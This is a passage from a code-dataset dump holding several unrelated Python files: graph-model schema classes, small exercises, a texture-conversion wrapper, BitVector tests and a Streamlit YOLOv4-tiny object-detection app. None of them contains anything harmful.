field(default_factory=datetime.now)\n created_by: str = field(default=\"\")\n updated_by: str = field(default=\"\")\n id: t.ModelPropertyId = field(default_factory=lambda: t.ModelPropertyId(uuid4()))\n\n @validates(\"name\")\n def validate_name(self, name):\n # HACK: this validation is defined as a method to work around a\n # circular import between `models.validation` and `models.types`\n from .validate import validate_property_name\n\n try:\n validate_property_name(name)\n except err.PropertyNameValidationError as e:\n raise ValidationError from e\n\n def to_dict_with_string_datatype(self, camel_case: bool = False):\n \"\"\"\n Special method for serializing properties with the datatype represented\n as a serialized JSON dict.\n \"\"\"\n d = self.to_dict(camel_case=camel_case)\n if camel_case:\n d[\"dataType\"] = dt.serialize(self.data_type)\n else:\n d[\"data_type\"] = dt.serialize(self.data_type)\n return d\n\n def __post_init__(self):\n if isinstance(self.data_type, str):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"data_type\", dt.deserialize(self.data_type))\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass ModelRelationshipSchema(CamelCaseSchema):\n id = fields.UUID()\n from_ = fields.UUID(data_key=\"from\")\n to = fields.UUID()\n type = fields.String()\n name = fields.String()\n display_name = fields.String()\n description = 
fields.String()\n one_to_many = fields.Boolean()\n created_by = fields.String()\n updated_by = fields.String()\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n index = fields.Integer(required=False, allow_none=True, default=None)\n\n @post_load\n def make(self, data, **kwargs):\n return ModelRelationship(**data)\n\n\n@dataclass(frozen=True)\nclass ModelRelationship(Serializable):\n \"\"\"\n A representation of a relationship between two `Model` nodes at the\n schema level of the form:\n\n (m:Model)--[r:MODEL_RELATIONSHIP_TYPE]->(p:Model)\n\n The `one_to_many` property encodes how the relationship can be applied at the\n record level:\n\n - one_to_many = True : The relationship can be used to link one record\n to many other records, or potentially none.\n\n - one_to_many = False : The relationship can only be used to link to a\n maximum of one other record (one-to-one). This is how\n \"linked-property\" functionality currently works in the\n concepts-service.\n\n The `index` property stores the display order of linked property\n relationships, like the `ModelProperty.index`. This is returned as\n `position` in the legacy API.\n \"\"\"\n\n __schema__: ClassVar[ModelRelationshipSchema] = ModelRelationshipSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"id\", \"name\", \"display_name\", \"one_to_many\", \"from_\", \"to\"]\n )\n\n id: t.ModelRelationshipId\n one_to_many: bool\n name: t.RelationshipName\n display_name: str\n description: str\n from_: UUID\n to: UUID\n type: t.RelationshipType\n created_by: t.UserNodeId\n updated_by: t.UserNodeId\n created_at: datetime\n updated_at: datetime\n index: Optional[int]\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass PropertyValueSchema(CamelCaseSchema):\n name = fields.String()\n value = fields.Raw()\n\n @post_load\n def make(self, data, **kwargs):\n return PropertyValue(**data)\n\n\n@dataclass(frozen=True)\nclass PropertyValue(Serializable):\n \"\"\"\n Key-value structure used to specify a property to update for a record\n\n NOTE: this is currently unused but will be needed when we build the legacy/\n backwards-compatible API.\n \"\"\"\n\n __schema__: ClassVar[PropertyValueSchema] = PropertyValueSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"value\"])\n\n name: str\n value: t.GraphValue\n\n\nclass RecordStubSchema(CamelCaseSchema):\n id = fields.UUID()\n title = fields.String(required=False, allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return RecordStub(**data)\n\n\n@dataclass(frozen=True)\nclass RecordStub(Serializable):\n \"\"\"\n A stub of a record which contains partial information about it.\n\n A stub is a reference to a full record containing the ID of the actual\n record along with a string describing the contents of the record itself.\n \"\"\"\n\n __schema__: ClassVar[RecordStubSchema] = RecordStubSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"id\", \"title\"])\n\n id: UUID\n title: Optional[str] = field(default=None)\n\n @classmethod\n def from_node(cls, data: List[Tuple[str, t.GraphValue]]) -> \"RecordStub\":\n values = dict(data)\n title: Optional[str] = cast(Optional[str], values.get(\"title\")) or cast(\n Optional[str], 
values.get(\"name\")\n )\n id = into_uuid(values[\"@id\"])\n return RecordStub(id=id, title=title)\n\n\nclass RecordSchema(CamelCaseSchema):\n id = fields.UUID()\n values = fields.Dict(keys=fields.Str(), values=fields.Raw())\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n created_by = fields.String()\n updated_by = fields.String()\n\n @pre_dump\n def json_dump_safe(self, record, many=False):\n for k in record.values:\n v = record.values[k]\n if is_datetime(v):\n record.values[k] = normalize_datetime(v)\n return record\n\n @post_load\n def make(self, data, **kwargs):\n return Record(**data)\n\n\n@dataclass(frozen=True, order=True)\nclass Record(Serializable):\n \"\"\"\n A record and associated property values.\n \"\"\"\n\n __schema__: ClassVar[RecordSchema] = RecordSchema(unknown=marshmallow.EXCLUDE)\n\n PUBLIC: ClassVar[Set[str]] = set([\"id\", \"values\"])\n\n id: t.RecordId\n values: Dict[str, Union[t.GraphValue, \"Record\", RecordStub]]\n created_at: datetime\n updated_at: datetime\n created_by: t.UserNodeId\n updated_by: t.UserNodeId\n name: Optional[str] = field(default=None, compare=False)\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n @classmethod\n def from_node(\n cls,\n data: List[Tuple[str, Union[t.GraphValue, \"Record\", RecordStub]]],\n created_at: datetime,\n updated_at: datetime,\n created_by: str,\n updated_by: str,\n property_map: Optional[Dict[str, ModelProperty]] = None,\n fill_missing: bool = False,\n ) -> \"Record\":\n \"\"\"\n Hydrate a `Record` from a Neo4j `Node`.\n\n This assumes that all non-id fields on the Node are property values.\n\n - If a property map is provided, missing default values will be used\n to fill in missing property entries from the `Record#values` member.\n\n - If `fill_missing` is `True` and a property map is provided, any\n property appearing in the property map that is either not present in\n `data` or that does not possess a default value will be set to `None`.\n\n If `fill_missing` is omitted or `False`, no entry will be filled in\n `Record#values`.\n \"\"\"\n values = dict(data)\n\n id = t.RecordId(into_uuid(values.pop(\"@id\")))\n\n # Pop keywords in a loop instead of a dict-comprehension to avoid\n # allocating a new dictionary\n reserved = [k for k in values if is_reserved_property_name(k)]\n for k in reserved:\n values.pop(k)\n\n record = cls(\n id=id,\n values=values,\n created_at=normalize_datetime(created_at),\n updated_at=normalize_datetime(updated_at),\n created_by=t.UserNodeId(created_by),\n updated_by=t.UserNodeId(updated_by),\n name=cls.compute_record_name(property_map, values),\n )\n\n if property_map is not None:\n record.fill_missing_values(property_map, fill_missing=fill_missing)\n\n return record\n\n def embed(self, with_key: str, other: Union[\"Record\", RecordStub]) -> \"Record\":\n \"\"\"\n Embeds the `other` record or stub to the `values` dict of this record\n under under the supplied key `with_key`.\n \"\"\"\n key = humps.decamelize(with_key).lower()\n if key in self.values:\n raise Exception(f\"violation: record linking name already taken: {key}\")\n self.values[key] = other\n return self\n\n def fill_missing_values(\n self, property_map: Dict[str, ModelProperty], fill_missing: bool = False\n ) -> None:\n \"\"\"\n Scan `records` and for 
record\n that have a default value defined.\n \"\"\"\n for name, prop in property_map.items():\n # Does the property have a default value?\n if prop.default and (name not in self.values or self.values[name] is None):\n self.values[name] = prop.default_value\n elif fill_missing and name not in self.values:\n # Create an entry for the missing value:\n self.values[name] = None\n\n @staticmethod\n def compute_record_name(\n property_map: Optional[Dict[str, ModelProperty]],\n values: Dict[str, Union[t.GraphValue, \"Record\", RecordStub]],\n ) -> Optional[str]:\n \"\"\"\n The name of the record is the value of the \"title\" property for\n the record's model.\n \"\"\"\n if property_map is None:\n return None\n\n title_property = next((p for p in property_map.values() if p.model_title), None)\n if title_property is None:\n return None\n\n title_value = values.get(title_property.name)\n if title_value is None:\n return None\n\n return str(title_value)\n\n\nclass PagedResultSchema(CamelCaseSchema):\n results = fields.Nested(Record.schema(), many=True)\n next_page = fields.Integer(allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return PagedResult(**data)\n\n\n@dataclass(frozen=True)\nclass PagedResult(Serializable):\n \"\"\"\n A paged result\n \"\"\"\n\n __schema__: ClassVar[PagedResultSchema] = PagedResultSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"results\", \"next_page\"])\n\n results: List[Record]\n next_page: Optional[t.NextPageCursor]\n\n @property\n def empty(self):\n return len(self.results) == 0\n\n def __iter__(self):\n return iter(self.results)\n\n def __len__(self):\n return len(self.results)\n\n def __getitem__(self, index):\n return self.results[index]\n\n\nclass RecordRelationshipSchema(CamelCaseSchema):\n id = fields.UUID()\n from_ = fields.UUID(data_key=\"from\")\n to = fields.UUID()\n type = fields.String()\n model_relationship_id = fields.UUID()\n name = fields.String()\n display_name = fields.String()\n one_to_many = fields.Boolean()\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n created_by = fields.String()\n updated_by = fields.String()\n\n @post_load\n def make(self, data, **kwargs):\n return RecordRelationship(**data)\n\n\n@dataclass(frozen=True)\nclass RecordRelationship(FromNodeMixin, Serializable):\n \"\"\"\n A representation of a relationship between two `Record` nodes at the\n instance level of the form:\n\n (r1:Record)--[r:MODEL_RELATIONSHIP_TYPE]->(r2:Record)\n \"\"\"\n\n __schema__: ClassVar[RecordRelationshipSchema] = RecordRelationshipSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"id\", \"from_\", \"to\", \"type\", \"name\", \"model_relationship_id\", \"display_name\"]\n )\n\n from_: t.RecordId\n to: t.RecordId\n type: t.RelationshipType\n model_relationship_id: t.ModelRelationshipId\n name: t.RelationshipName\n display_name: str\n one_to_many: bool\n created_at: datetime\n updated_at: datetime\n created_by: t.UserNodeId\n updated_by: t.UserNodeId\n id: t.RecordRelationshipId\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass PackageProxySchema(CamelCaseSchema):\n id = fields.UUID()\n proxy_instance_id = fields.UUID()\n package_id = 
fields.Integer()\n package_node_id = fields.String()\n relationship_type = fields.String()\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n created_by = fields.String()\n updated_by = fields.String()\n\n @post_load\n def make(self, data, **kwargs):\n return PackageProxy(**data)\n\n\n@dataclass(frozen=True)\nclass PackageProxy(FromNodeMixin, Serializable):\n\n __schema__: ClassVar[PackageProxySchema] = PackageProxySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"id\", \"proxy_instance_id\", \"package_id\", \"package_node_id\"]\n )\n\n id: UUID\n proxy_instance_id: UUID\n package_id: int\n package_node_id: str\n relationship_type: t.RelationshipName\n created_at: datetime\n updated_at: datetime\n created_by: str\n updated_by: str\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass ProxyRelationshipCountSchema(CamelCaseSchema):\n name = fields.String()\n display_name = fields.String()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return ProxyRelationshipCount(**data)\n\n\n@dataclass(frozen=True)\nclass ProxyRelationshipCount(FromNodeMixin, Serializable):\n\n __schema__: ClassVar[ProxyRelationshipCountSchema] = ProxyRelationshipCountSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n name: str\n display_name: str\n count: int\n\n\n# --- Topology ----------------------------------------------------------------\n\n\nclass ModelTopologySchema(CamelCaseSchema):\n id = fields.UUID()\n name = fields.String()\n display_name = fields.String()\n description = fields.String()\n count = fields.Integer()\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n\n @post_load\n def make(self, data, **kwargs):\n return ModelTopology(**data)\n\n\n@dataclass(frozen=True)\nclass ModelTopology(Serializable):\n\n __schema__: ClassVar[ModelTopologySchema] = ModelTopologySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\n \"id\",\n \"name\",\n \"display_name\",\n \"description\",\n \"count\",\n \"created_at\",\n \"updated_at\",\n ]\n )\n\n id: UUID\n name: str\n display_name: str\n description: str\n count: int\n created_at: datetime\n updated_at: datetime\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\n# --- Structure ---------------------------------------------------------------\n\n\n@dataclass(frozen=True)\nclass GraphSchemaStructure:\n models: List[Model]\n relationships: List[ModelRelationship]\n\n\n# --- Summary -----------------------------------------------------------------\n\n\nclass ModelSummarySchema(CamelCaseSchema):\n name = fields.String()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return ModelSummary(**data)\n\n\n@dataclass(frozen=True)\nclass ModelSummary(Serializable):\n\n __schema__: ClassVar[ModelSummarySchema] = ModelSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"count\"])\n\n name: str\n count: int\n\n\nclass RelationshipSummarySchema(CamelCaseSchema):\n name = 
fields.String()\n from_ = fields.UUID(data_key=\"from\")\n to = fields.UUID()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return RelationshipSummary(**data)\n\n\n@dataclass(frozen=True)\nclass RelationshipSummary(Serializable):\n\n __schema__: ClassVar[RelationshipSummarySchema] = RelationshipSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"from_\", \"to\", \"count\"])\n\n name: str\n from_: UUID\n to: UUID\n count: int\n\n\nclass RelationshipTypeSummarySchema(CamelCaseSchema):\n name = fields.String()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return RelationshipTypeSummary(**data)\n\n\nclass RecordSummarySchema(CamelCaseSchema):\n name = fields.String()\n display_name = fields.String()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return RecordSummary(**data)\n\n\n@dataclass(frozen=True)\nclass RecordSummary(Serializable):\n\n __schema__: ClassVar[RecordSummarySchema] = RecordSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"display_name\", \"count\"])\n\n name: str\n display_name: str\n count: int\n\n\n@dataclass(frozen=True)\nclass RelationshipTypeSummary(Serializable):\n\n __schema__: ClassVar[RelationshipTypeSummarySchema] = RelationshipTypeSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"count\"])\n\n name: str\n count: int\n\n\nclass TopologySummarySchema(CamelCaseSchema):\n model_summary = fields.Nested(ModelSummary.schema(), many=True)\n relationship_summary = fields.Nested(RelationshipSummary.schema(), many=True)\n relationship_type_summary = fields.Nested(\n RelationshipTypeSummary.schema(), many=True\n )\n model_count = fields.Integer()\n model_record_count = fields.Integer()\n relationship_count = fields.Integer()\n relationship_record_count = fields.Integer()\n relationship_type_count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return TopologySummary(**data)\n\n\n@dataclass(frozen=True)\nclass TopologySummary(Serializable):\n\n __schema__: ClassVar[TopologySummarySchema] = TopologySummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\n \"model_summary\",\n \"relationship_summary\",\n \"relationship_type_summary\",\n \"model_count\",\n \"model_record_count\",\n \"relationship_count\",\n \"relationship_record_count\",\n \"relationship_type_count\",\n ]\n )\n\n model_summary: List[ModelSummary]\n relationship_summary: List[RelationshipSummary]\n relationship_type_summary: List[RelationshipTypeSummary]\n model_count: int\n model_record_count: int\n relationship_count: int\n relationship_record_count: int\n relationship_type_count: int\n\n\n@dataclass(frozen=False)\nclass CreateRecordRelationship(Serializable):\n\n from .legacy import CreateModelRelationship\n\n from_: t.RecordId\n to: t.RecordId\n model_relationship_to_create: Optional[CreateModelRelationship] = None\n model_relationship: Optional[ModelRelationship] = None\n\n\nclass DatasetDeletionCountsSchema(CamelCaseSchema):\n models = fields.Integer()\n properties = fields.Integer()\n records = fields.Integer()\n packages = fields.Integer()\n relationship_stubs = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return DatasetDeletionCounts(**data)\n\n\n@dataclass(frozen=False)\nclass DatasetDeletionCounts(Serializable):\n\n
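 # NOTE (editor's sketch): __add__ and update() below let callers accumulate\n # per-batch deletion totals, e.g. total = DatasetDeletionCounts.empty() + batch1 + batch2.\n __schema__: ClassVar[DatasetDeletionCountsSchema] = DatasetDeletionCountsSchema(\n 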
unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"models\", \"properties\", \"records\", \"packages\", \"relationship_stubs\"]\n )\n\n models: int\n properties: int\n records: int\n packages: int\n relationship_stubs: int\n\n @classmethod\n def empty(cls):\n return DatasetDeletionCounts(\n models=0, properties=0, records=0, packages=0, relationship_stubs=0\n )\n\n def __add__(self, other) -> \"DatasetDeletionCounts\":\n return DatasetDeletionCounts(\n models=self.models + other.models,\n properties=self.properties + other.properties,\n records=self.records + other.records,\n packages=self.packages + other.packages,\n relationship_stubs=self.relationship_stubs + other.relationship_stubs,\n )\n\n def update(self, counts: \"DatasetDeletionCounts\") -> \"DatasetDeletionCounts\":\n return self + counts\n\n\nclass DatasetDeletionSummarySchema(CamelCaseSchema):\n done = fields.Boolean()\n counts = fields.Nested(DatasetDeletionCounts.schema(), many=False)\n\n @post_load\n def make(self, data, **kwargs):\n return DatasetDeletionSummary(**data)\n\n\n@dataclass(frozen=False)\nclass DatasetDeletionSummary(Serializable):\n\n __schema__: ClassVar[DatasetDeletionSummarySchema] = DatasetDeletionSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"done\", \"counts\"])\n\n done: bool\n counts: DatasetDeletionCounts\n\n def update_counts(self, counts: DatasetDeletionCounts) -> \"DatasetDeletionSummary\":\n return DatasetDeletionSummary(done=self.done, counts=self.counts.update(counts))\n","repo_name":"clohr/model-service","sub_path":"server/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":36652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}

{"seq_id":"31447268343","text":"def multiply(a, b): \n ans = 0\n for i in range(a): \n ans += b\n return ans\n\ndef exponent(base, exp): \n ans = 1\n for i in range(exp): \n ans = multiply(ans, base)\n return ans\n\ndef square(n): \n return exponent(n, 2)\n\n#test\nprint(multiply(2, 3),\n exponent(2,3),\nsquare(2))\n","repo_name":"bucs110SPRING23/portfolio-anna-nm","sub_path":"ch05/exercises/scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}

{"seq_id":"3557663170","text":"def list_of_dicts(marks):\n result = []\n for i in range(len(marks['Name'])):\n result.append({key : marks[key][i] for key in marks})\n return result\n\nmarks = {'Name': [\"Jan\", \"Piet\", \"Joris\", \"Corneel\"], 'Science': [88, 89, 62, 95], 'Language': [77, 78, 84, 80]}\n\nprint(\"Original dictionary of lists:\")\nprint(marks)\n\n# expected output: {'Name': [\"Jan\", \"Piet\", \"Joris\", \"Corneel\"],'Science': [88, 89, 62, 95], 'Language': [77, 78, 84, 80]}\nprint(\"\\nSplit said dictionary of lists into list of dictionaries:\")\nprint(list_of_dicts(marks))\n# expected output:\n# [{'Name': 'Jan', 'Science': 88, 'Language': 77}, {'Name': 'Piet', 'Science': 89, 'Language': 78}, {'Name': 'Joris', 'Science': 62, 'Language': 84}, {'Name': 'Corneel', 'Science': 95, 'Language': 80}]","repo_name":"wackojens/Python101","sub_path":"extra oef kerstvakantie/extraOef3_JC.py","file_name":"extraOef3_JC.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}

{"seq_id":"70960771309","text":"import os\r\n\r\ndef txmake(type=\"\"):\r\n
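 # NOTE (editor, hedged): this wraps the external 'maketx' tool from OpenImageIO,\r\n # which must be on PATH; e.g. txmake('.exr') converts only EXRs in the current\r\n # working directory, while txmake() converts every supported type.\r\n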
 # file extensions eligible for .tx conversion\r\n ext_list = ['.exr','.png','.jpg','.tiff']\r\n\r\n # get current working directory\r\n cwd = os.getcwd()\r\n\r\n # get all the files from the directory\r\n all_files = os.listdir(cwd)\r\n\r\n \r\n\r\n # set extension list\r\n if type == \"\":\r\n extensions = ext_list\r\n else:\r\n # check if the extension is valid\r\n int_ext = [type]\r\n if int_ext[0] in ext_list:\r\n extensions = int_ext\r\n else:\r\n # editor's fix: bail out on an unsupported extension instead of\r\n # hitting a NameError on 'extensions' below\r\n return\r\n \r\n # convert every file whose extension is in the allowed list\r\n for file in all_files:\r\n raw,ext = os.path.splitext(file)\r\n if ext in extensions:\r\n image_file_path = os.path.join(cwd,raw) + ext\r\n tx_file_path = os.path.join(cwd,raw) + \".tx\"\r\n maketx = f\"maketx -v -u --oiio --checknan --filter lanczos3 {image_file_path} -o {tx_file_path}\"\r\n os.system(maketx)\r\n\r\n \r\n\r\ndef test(type=\"\"):\r\n print(\"hello\")\r\n","repo_name":"deepakxyz/devtry","sub_path":"devtry-cli/tx/txmake.py","file_name":"txmake.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}

{"seq_id":"43600623782","text":"import BitVector\nimport unittest\n\nbv1 = BitVector.BitVector( bitstring = '00110011' )\nbv2 = BitVector.BitVector( bitlist = [1,1,1,1,0,0,1,1] )\nbv3 = BitVector.BitVector( bitstring = '00000000111111110000000' )\nbv4 = BitVector.BitVector( bitstring = '' )\nbv5 = BitVector.BitVector( size = 0 )\n\n\n\nlogicTests = [\n ((bv1,bv2, '&'), '00110011'),\n ((bv1,bv3, '&'), ''),\n ((bv1,bv4, '&'), ''),\n ((bv1,bv5, '&'), ''),\n ((bv1,bv2, '|'), '11110011'),\n ((bv1,bv3, '|'), ''),\n ((bv1,bv4, '|'), ''),\n ((bv1,bv5, '|'), ''),\n ((bv1,'', '~'), '11001100'),\n ]\n\nclass BooleanLogicTestCase(unittest.TestCase):\n def checkLogicOp(self):\n print(\"\\nTesting Boolean operators\") \n for args, expected in logicTests:\n try:\n op = args[2]\n if (op == '&'):\n actual = args[0] & args[1]\n elif (op == '|'):\n actual = args[0] | args[1]\n elif (op == '~'):\n actual = ~args[0]\n assert actual == BitVector.BitVector( bitstring = expected )\n except Exception as e:\n if ( args[0].size == args[1].size ):\n print(e)\n print(\" BOOLEAN LOGIC TEST FAILED\")\n\ndef getTestSuites(type):\n return unittest.TestSuite([\n unittest.makeSuite(BooleanLogicTestCase, type)\n ]) \n","repo_name":"phonchi/Interactive-Crypto-HandBook","sub_path":"Misc/TestBitVector/TestBooleanLogic.py","file_name":"TestBooleanLogic.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}

{"seq_id":"21075104471","text":"import asyncio\nimport logging\nimport queue\nimport threading\nimport urllib.request\nfrom pathlib import Path\nfrom typing import List, NamedTuple\n\ntry:\n from typing import Literal\nexcept ImportError:\n from typing_extensions import Literal # type: ignore\n\nimport av\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pydub\nimport streamlit as st\nfrom aiortc.contrib.media import MediaPlayer\n\nimport time\nimport pandas as pd\n\n\nfrom streamlit_webrtc import (\n AudioProcessorBase,\n ClientSettings,\n VideoProcessorBase,\n WebRtcMode,\n webrtc_streamer,\n)\n\nHERE = Path(__file__).parent\n\nlogger = logging.getLogger(__name__)\n\n\nst.set_page_config(page_title=\"Object Detection\", page_icon=\"🤖\")\n\n\nWEBRTC_CLIENT_SETTINGS = ClientSettings(\n rtc_configuration={\"iceServers\": [\n {\"urls\": [\"stun:stun.l.google.com:19302\"]}]},\n media_stream_constraints={\n \"video\": True,\n \"audio\": True,\n 
},\n)\n\n\ndef main():\n\n st.title(\"Lite Real time Object Detection WebApp\")\n st.subheader(\"Using YOLOv4 tiny\")\n\n option = st.selectbox(\n 'Please Select the Configuration file', (\"yolov4-tiny.cfg\",))\n\n option = st.selectbox('Please Select the Weight file',\n (\"yolov4-tiny.weights\",))\n\n with st.spinner('Wait for the Weights and Configuration files to load'):\n time.sleep(3)\n st.success('Done!')\n\n st.info(\"Please wait for 30-40 seconds for the webcam to load with the dependencies\")\n\n app_object_detection()\n\n st.error('Please allow access to camera and microphone in order for this to work')\n st.warning(\n 'The object detection speed and accuracy might vary depending on the server speed and internet speed')\n\n st.subheader(\"List of COCO dataset classes\")\n st.text(\"Total number of classes is 80\")\n df = pd.read_excel(\"dataset.xlsx\")\n\n st.write(df)\n\n st.subheader(\"How does it work?\")\n st.text(\"Here is a visualization of the algorithm\")\n st.image(\".//Media//pic1.png\", caption=\"YOLO Object Detection of 'Dog', 'Bicycle', 'Car'\", width=None, use_column_width=None,\n clamp=False, channels='RGB', output_format='auto')\n st.image(\"./Media/pic2.png\", caption=\"Algorithm\", width=None, use_column_width=None,\n clamp=False, channels='RGB', output_format='auto')\n\n st.subheader(\"About this App\")\n\n st.markdown(\"\"\"\n This app displays only data from the COCO dataset downloaded from https://pjreddie.com/darknet/yolo/\n and the configuration files and weights can be changed in the source code by downloading them from the above website.\n\n You can see how this works in the [source code](https://github.com/rahularepaka/ObjectDetectionYolov4Web).\n\n \"\"\")\n\n with st.expander(\"Source Code\", expanded=False):\n st.markdown(\"\"\"\n\n https://github.com/rahularepaka/ObjectDetectionYolov4Web/blob/main/src/yolo-main.py\n \n \"\"\")\n\n with st.expander(\"License\"):\n\n st.markdown(\"\"\"\n \n MIT License\n\n Copyright (c) 2021 Rahul Arepaka\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in all\n copies or substantial portions of the Software.\n \"\"\"\n )\n\n st.subheader(\"Author\")\n st.markdown(\n '''\n I am Rahul Arepaka, II year CompSci student at Ecole School of Engineering, Mahindra University\n '''\n '''\n Linkedin Profile : https://www.linkedin.com/in/rahul-arepaka/\n '''\n '''\n Github account : https://github.com/rahularepaka\n '''\n )\n\n st.info(\"Feel free to edit the source code and enjoy coding\")\n\n logger.debug(\"=== Alive threads ===\")\n for thread in threading.enumerate():\n if thread.is_alive():\n logger.debug(f\" {thread.name} ({thread.ident})\")\n\n\n# Threshold Values\nConf_threshold = 0.4\nNMS_threshold = 0.4\n\n# Colours\nCOLORS = [(0, 255, 0), (0, 0, 255), (255, 0, 0),\n (255, 255, 0), (255, 0, 255), (0, 255, 255)]\n\n# empty list\nclass_name = []\n\n#Coco - Server\nCOCO = \"/app/objectdetectionyolov4web/models/coco.names\"\n\n#Coco - Local\n#COCO = \"models\\\\coco.names\"\n
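\n# NOTE (editor, hedged): the absolute /app/... paths above appear to assume the hosted\n# (Streamlit sharing) checkout layout; for local runs switch to the commented-out \"models\" paths.\n\n# for reading all the datasets from the coco.names file into the array\nwith open(COCO, 'rt') as 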
f:\n class_name = f.read().rstrip('\\n').split('\\n')\n\n# configuration and weights file location - Server\nmodel_config_file = \"/app/objectdetectionyolov4web/models/yolov4-tiny.cfg\"\nmodel_weight = \"/app/objectdetectionyolov4web/models/yolov4-tiny.weights\"\n\n# configuration and weights file location - Local\n#model_config_file = \"models\\\\yolov4-tiny.cfg\"\n#model_weight = \"models\\\\yolov4-tiny.weights\"\n\n\n# darknet files\nnet = cv2.dnn.readNet(model_weight, model_config_file)\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n# Load Model\nmodel = cv2.dnn_DetectionModel(net)\nmodel.setInputParams(size=(416, 416), scale=1/255, swapRB=True)\n\n\ndef app_object_detection():\n\n class Video(VideoProcessorBase):\n\n def recv(self, frame: av.VideoFrame) -> av.VideoFrame:\n image = frame.to_ndarray(format=\"bgr24\")\n\n classes, scores, boxes = model.detect(\n image, Conf_threshold, NMS_threshold)\n for (classid, score, box) in zip(classes, scores, boxes):\n\n color = COLORS[int(classid) % len(COLORS)]\n\n label = \"%s : %f\" % (class_name[classid[0]], score)\n\n cv2.rectangle(image, box, color, 1)\n cv2.putText(image, label, (box[0], box[1]-10),\n cv2.FONT_HERSHEY_COMPLEX, 0.5, color, 1)\n\n return av.VideoFrame.from_ndarray(image, format=\"bgr24\")\n\n webrtc_ctx = webrtc_streamer(\n key=\"object-detection\",\n mode=WebRtcMode.SENDRECV,\n client_settings=WEBRTC_CLIENT_SETTINGS,\n video_processor_factory=Video,\n async_processing=True,\n )\n\n\nif __name__ == 